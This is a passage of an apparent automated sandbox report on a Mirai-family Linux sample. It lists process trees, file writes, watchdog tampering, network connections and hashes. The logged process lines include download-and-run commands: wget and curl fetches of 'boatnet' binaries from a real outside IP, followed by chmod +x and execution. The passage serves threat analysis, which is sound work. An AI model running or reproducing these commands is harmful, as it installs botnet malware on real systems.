| File opened for reading | /proc/25/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1676/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/9/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1486/status | /tmp/WTF | N/A |
| File opened for reading | /proc/467/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1514/status | /tmp/WTF | N/A |
| File opened for reading | /proc/440/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1528/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1637/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1618/status | /tmp/WTF | N/A |
| File opened for reading | /proc/19/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1515/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1544/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1143/status | /tmp/WTF | N/A |
| File opened for reading | /proc/323/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1620/status | /tmp/WTF | N/A |
| File opened for reading | /proc/18/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 151.101.1.91:443 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp | |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1525-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1534-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1543-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1552-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1561-5-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1603-6-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1613-7-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1629-8-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1646-9-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1671-10-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1682-11-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1692-12-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1703-13-0x0000000008048000-0x000000000805ce08-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2004-amd64-20240729-en
Max time kernel
59s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/78/status | /tmp/WTF | N/A |
| File opened for reading | /proc/443/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1548/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1493/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1319/status | /tmp/WTF | N/A |
| File opened for reading | /proc/536/status | /tmp/WTF | N/A |
| File opened for reading | /proc/995/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1124/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1570/status | /tmp/WTF | N/A |
| File opened for reading | /proc/163/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1086/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1514/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1528/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1605/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1485/status | /tmp/WTF | N/A |
| File opened for reading | /proc/301/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1522/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/76/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1503/status | /tmp/WTF | N/A |
| File opened for reading | /proc/761/status | /tmp/WTF | N/A |
| File opened for reading | /proc/75/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1123/status | /tmp/WTF | N/A |
| File opened for reading | /proc/12/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1551/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1074/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1052/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1454/status | /tmp/WTF | N/A |
| File opened for reading | /proc/800/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1487/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1074/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1546/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1082/status | /tmp/WTF | N/A |
| File opened for reading | /proc/71/status | /tmp/WTF | N/A |
| File opened for reading | /proc/89/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1122/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1454/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1461/status | /tmp/WTF | N/A |
| File opened for reading | /proc/808/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1570/status | /tmp/WTF | N/A |
| File opened for reading | /proc/2/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1574/status | /tmp/WTF | N/A |
| File opened for reading | /proc/616/status | /tmp/WTF | N/A |
| File opened for reading | /proc/505/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1548/status | /tmp/WTF | N/A |
| File opened for reading | /proc/636/status | /tmp/WTF | N/A |
| File opened for reading | /proc/761/status | /tmp/WTF | N/A |
| File opened for reading | /proc/827/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1481/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1088/status | /tmp/WTF | N/A |
| File opened for reading | /proc/175/status | /tmp/WTF | N/A |
| File opened for reading | /proc/176/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1494/status | /tmp/WTF | N/A |
| File opened for reading | /proc/70/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1435/status | /tmp/WTF | N/A |
| File opened for reading | /proc/480/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1597/status | /tmp/WTF | N/A |
| File opened for reading | /proc/952/status | /tmp/WTF | N/A |
| File opened for reading | /proc/538/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1508/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
